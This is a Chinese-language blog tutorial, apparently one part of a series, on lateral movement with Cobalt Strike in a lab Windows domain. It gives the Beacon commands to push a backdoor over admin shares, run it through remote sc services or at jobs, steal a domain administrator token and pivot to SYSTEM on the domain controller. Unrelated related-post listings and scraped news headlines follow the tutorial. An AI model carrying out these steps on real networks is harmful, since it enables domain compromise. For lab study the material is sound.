Cobalt Strike 内网横向渗透获取权限(子篇3)

域内环境

系统IP备注
kali192.168.0.134teamserver
server 2008r210.10.10.4dc域控

server 2008r2

(database1)

192.168.0.163  10.10.10.6本次测试的重点
win7192.168.0.130  10.10.10.5(内网ip)victim被控端

6.内网横向渗透获取权限

    6.1代码执行的方法

     方法一  系统权限获得

     shell copy C:\Users\moonsec.TEST1\http.exe  \\database1\C$\WINDOWS\TEMP\http.exe

     shell sc \\host create name binpath=c:\windows\temp\file.exe   

     shell sc  \\host start name

     shell sc \\host delete name

    方法二  当前权限执行

     shell net time \\host

     shell at \\host HH:MM c:\path\to\bad.exe

    窃取标记   

    steal  token 2760

    验证是否可以攻击域控

    shell dir \\dc\c$

被控端主机beacon进来

 派生一个smb-beacon会话,内网的话最好用smb来做,它可以绕过一些防火墙

 会话sleep设置为0

 这边连接过来了,拿这个做渗透

 看一下当前的权限和内网的信任主机 shell whoami 和net view

 查看TEST1域下的所有信任主机

 

 方法一 SC服务获取权限   

攻击database1域 因为moonsec是它的管理员,可以访问它  

 生成一个后门  

 

 把它上传到被控端

 上传到Users目录下

 把当前文件复制到远程的database1域里面     

 创建一个a1的服务,服务名最好和后面的文件名一样 

 启动sc服务的a1文件

 这样的话就有了一台主机 

 现在可以删除服务,但是不会丢,已经加载到内存里面了

 方法二   当前权限执行  

创建后门              

 

 

 同样如方法一上传,然后复制到主机里面

这个时候多了一台

 这个时候又多了一台

 为了节约时间,会话时间设置为0

 

可以看到当前为系统权限

 看看域管理员是否有在进程列表里面, 如果在的话进行窃取标记     

 

 那么就可以访问域控dc的c盘啦   

 

 如何跟域控服务器交互?                

     kali和域控不在一个ip段 不能交互               

     所以要用到转发监听器     这里可以把它理解为一个代理        

 

 这边就会启动转发服务   

 新建一个后门        

 记住一定要选择之前设定的转发器名字,否则没用

 

 把它上传到这台主机中

 upload到temp目录下

复制到dc域中

 看看能不能访问dc域的时间

然后启动它,建立连接,就有了dc的系统权限

这个时候可以进到里面来

shell dir

现在可以看一下视图

 

真的敢耗时1个月10万字解决Linux内网渗透
aa119101的博客
05-25 2942
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的。本片文章将从拿到一个Linux shell开始,介绍Linux内网渗透技术,分为容器逃逸、Linux提权、Linux信息收集、Linux隧技术、Linux横向移动、Linux权限维持、Linux痕迹清理几个部分。 容器逃逸 容器逃逸的应用主要是,拿到shell之后,发现是docker环境,要进一步渗透,就必须逃逸到宿主机。 容器逃逸方法见: https://www.cn
CobaltStrike4.0渗透测试手册
03-18
CobaltStrike4.0渗透测试手册
水平、垂直权限问题(横向越权与纵向越权)
迷路剑客个人博客
07-23 2368
水平、垂直权限问题(横向越权与纵向越权) 转载声明 本文大量内容系转载自以下文章,有删改,并参考其他文档资料加入了一些内容: 水平、垂直权限问题(横向越权与纵向越权) 作者:碎羽love星谊 1 横向越权 1.1 基本概念 横向越权指的是攻击者尝试访问与他拥有相同权限级别的用户的资源 1.2 如何防止横向越权漏洞 可通过建立用户和可操作资源的绑定关系,用户对任何资源进行操作时,通过该绑定关系确保该资源是属于该用户所有的。 对请求中的关键参数进行间接映射,避免使用原始关键参数名,比如使用索引1代替id值1
系统用户权限与角色分析
IceHoo的专栏
09-13 2506
 一、术语说明:  1. 用户与角色:  用户与角色是使用权限的基本单位,角色是一组具有相同限限的用户变集。  用户与用户之间不存在相互隶属关系,它只能属于某个角色,角色可以隶属于其它角色,且可以为多重隶属关系。  2. 应用模块 应用模块通常是指某个页面(在WEB中)如统计报表页面,用户信息页面等等。  3. 操作  即指在应用模块中对某个功能是否具有访问权限。如用户信息页面的修改功能,
Cobalt Strike(十)内网登录认证
qq_56426046的博客
09-25 642
系统备注kaliteamserver10.10.10.4域控10.10.10.6本次测试的重点victim 被控端。
p70 内网安全-域横向内网漫游 Socks 代理隧技术(NPS、FRP、CFS 三层内网漫游)
weixin_43263566的博客
05-03 3070
内网安全-域横向内网漫游 Socks 代理隧技术(NPS、FRP、CFS 三层内网漫游)
内网-域横向 CobaltStrike&SPN&RDP
mingyqf的博客
11-14 817
横向 CobaltStrike&SPN&RDP 本课重点: 案例1:域横向移动RDP传递-Mimikatz 案例2:域横向移动SPN服务-探针,请求,导出,破解,重写 案例3:域横向移动测试流程一把梭哈-CobaltStrike初体验 案例1-域横向移动RDP传递-Mimikatz 除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。 RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断 RDP明
利用cobalt strike获取域控权限
mirror97black的博客
04-02 2313
cobalt strike cobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。 前期准备 获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。 域内收集信息 通过一些cmd命令,可以收集到域内的信息 在cs的会话中,执行命令 查看有多少域和工作组 shell net...
内网渗透(一):获得权限
热门推荐
sid10t.
05-01 2万+
文章目录前言实战准备攻击后记 前言 本博文仅供学习使用,请勿他用!!! 网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现; 本文将会介绍如何获取一个系统权限;   实战 准备 打开两个虚拟机,这里我用的是 kali 和 windows7,kali 作为攻击机,那么 windows7 就作为肉鸡; 查看两台机子的 IP: Kali IP Windows7 IP ping 一下,可以连通,那就开始攻击准
Cobalt Strike域内渗透子篇1)
yyj1781572的博客
11-19 562
主要过程就是发现域内信任主机 ,查看是否有默认共享 ,用域的普通用户去验证枚举域内主机是否为本地管理员 ,通过winrm执行Mimikatz.ps1获取主域超级管理员密码
CobaltStrike域内自动化横向渗透子篇4)
yyj1781572的博客
11-20 306
CobaltStrike域内自动化横向渗透
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
CobaltStrike4.7
11-29
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序...
cobaltstrike多个版本
12-30
cobaltstrike4.3,cobaltstrike4.4,cobaltstrike4.5三个版本 安装教程以cs4.3为例: 1、xshell上传至kali,解压 unzip cobaltstrike 2、给cs的服务端teamserver和客户端start.sh执行权限 chmod +x teamserver start...
渗透测试笔记】之【内网渗透——Cobalt Strike信息收集】
AA8j的博客
07-02 1349
拓扑图 1.判断是否存在域 shell net view /domain ipconfig /all systeminfo net config workstation 以上足以判断就不一一举例了。 探测域内存活主机及端口 arp扫描 portscan null-255.255.255.255 0 arp 1024
内网渗透-横向渗透1
huangyongkang666的博客
04-01 2422
内网渗透-横向渗透1 1.横向渗透明文传递 at&schtasks ​ 在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机? 这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主 机上执行命令。 获取到某域主机权限->minikatz 得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户 名字典->用到密码明文当做密码字典-》尝试连接->创建计划任务(at|schta
内网渗透常用提权方式总结
j1044957016的博客
06-01 7093
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
Windows 内网渗透横向渗透
qq_53742230的博客
07-31 2972
内网渗透横向渗透
cobalt strike横向移动
最新发布
08-19
3. 借助已有权限:如果已经获取了某个系统权限,可以使用Cobalt Strike的post-exploitation功能,通过横向移动命令(如psexec、wmic等)在网络中传播。 4. 社会工程学攻击:Cobalt Strike也可以通过发送钓鱼邮件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
写文章

热门文章

  • xray扫描器的使用 (长亭科技公司创造) 8600
  • ProcessExplorer工具使用(24) 6892
  • ARP网络攻击实验 4801
  • 路由器防火墙配置(14) 4721
  • 实验二:DOS/DDOS拒绝服务攻击 4138

分类专栏

  • linux系列
  • 渗透测试 1篇
  • 护网行动系列 37篇
  • 经典漏洞利用 7篇
  • 主机渗透与网络攻击 5篇
  • 网安工具分享 1篇
  • 数据库 1篇
  • python 2篇
  • CTF 5篇
  • web安全 15篇
  • 靶机测试 1篇
  • 渗透工具Cobalt Stike使用 16篇
  • cisp-pte 1篇
  • 一句话木马 1篇
  • 后渗透emp使用 6篇
  • exp 5篇

最新评论

  • 路由器防火墙配置(14)

    m0_65833590: 求一份pkt文件,大佬

  • ARP网络攻击实验

    特拉法儿加D路飞: 为什么我看你毒化之后,在win7的ARP表中网关的物理地址也变化了,我的只有254的物理地址变了

  • 渗透测试综合实验(迂回渗透,入侵企业内网并将其控制为僵尸网络)

    Ra1nbθw: 反序列化终极测试工具能分享下吗

  • xray扫描器的使用 (长亭科技公司创造)

    jack-yyj: 支持代理池的

大家在看

  • 蜂窝备份守护,连锁门店数字化业务无忧运转 412
  • 计算机网络之曼彻斯特编码和差分曼彻斯特编码 914
  • 分享一个超强的网页自动化工具!写得快,跑得快,开发人员狂喜(带私活) 524
  • 推荐一个专业的 JavaScript 中文转拼音的库,同事都在用,小巧好用上手快(带私活) 895
  • 盘点几款国内外安全稳定的域名解析平台 152

最新文章

  • 反弹shell的N种姿势
  • MySQL提权/条件竞争漏洞分析和利用(37)
  • Fastjson反序列化漏洞
2023年53篇
2022年48篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或 充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

深圳SEO优化公司福田关键词排名报价临汾优秀网站设计多少钱德阳网站搭建报价南澳seo网站优化多少钱重庆网站改版公司临夏网站优化排名公司安阳网站推广工具报价滨州至尊标王价格鸡西模板制作哪家好崇左网站搭建价格衢州模板制作哪家好光明网站建设哪家好广州外贸网站建设保山网站seo优化价格珠海网站推广工具公司张家口SEO按天计费哪家好南通模板推广哪家好菏泽建站推荐阿坝外贸网站建设诸城高端网站设计公司乌海百姓网标王推广哪家好绍兴网站推广推荐益阳SEO按天扣费推荐濮阳网站关键词优化多少钱北京营销型网站建设报价安顺网站制作设计多少钱洛阳建设网站价格坪地网站优化软件多少钱南联网站建设哪家好大同网站改版价格歼20紧急升空逼退外机英媒称团队夜以继日筹划王妃复出草木蔓发 春山在望成都发生巨响 当地回应60岁老人炒菠菜未焯水致肾病恶化男子涉嫌走私被判11年却一天牢没坐劳斯莱斯右转逼停直行车网传落水者说“没让你救”系谣言广东通报13岁男孩性侵女童不予立案贵州小伙回应在美国卖三蹦子火了淀粉肠小王子日销售额涨超10倍有个姐真把千机伞做出来了近3万元金手镯仅含足金十克呼北高速交通事故已致14人死亡杨洋拄拐现身医院国产伟哥去年销售近13亿男子给前妻转账 现任妻子起诉要回新基金只募集到26元还是员工自购男孩疑遭霸凌 家长讨说法被踢出群充个话费竟沦为间接洗钱工具新的一天从800个哈欠开始单亲妈妈陷入热恋 14岁儿子报警#春分立蛋大挑战#中国投资客涌入日本东京买房两大学生合买彩票中奖一人不认账新加坡主帅:唯一目标击败中国队月嫂回应掌掴婴儿是在赶虫子19岁小伙救下5人后溺亡 多方发声清明节放假3天调休1天张家界的山上“长”满了韩国人?开封王婆为何火了主播靠辱骂母亲走红被批捕封号代拍被何赛飞拿着魔杖追着打阿根廷将发行1万与2万面值的纸币库克现身上海为江西彩礼“减负”的“试婚人”因自嘲式简历走红的教授更新简介殡仪馆花卉高于市场价3倍还重复用网友称在豆瓣酱里吃出老鼠头315晚会后胖东来又人满为患了网友建议重庆地铁不准乘客携带菜筐特朗普谈“凯特王妃P图照”罗斯否认插足凯特王妃婚姻青海通报栏杆断裂小学生跌落住进ICU恒大被罚41.75亿到底怎么缴湖南一县政协主席疑涉刑案被控制茶百道就改标签日期致歉王树国3次鞠躬告别西交大师生张立群任西安交通大学校长杨倩无缘巴黎奥运

深圳SEO优化公司 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化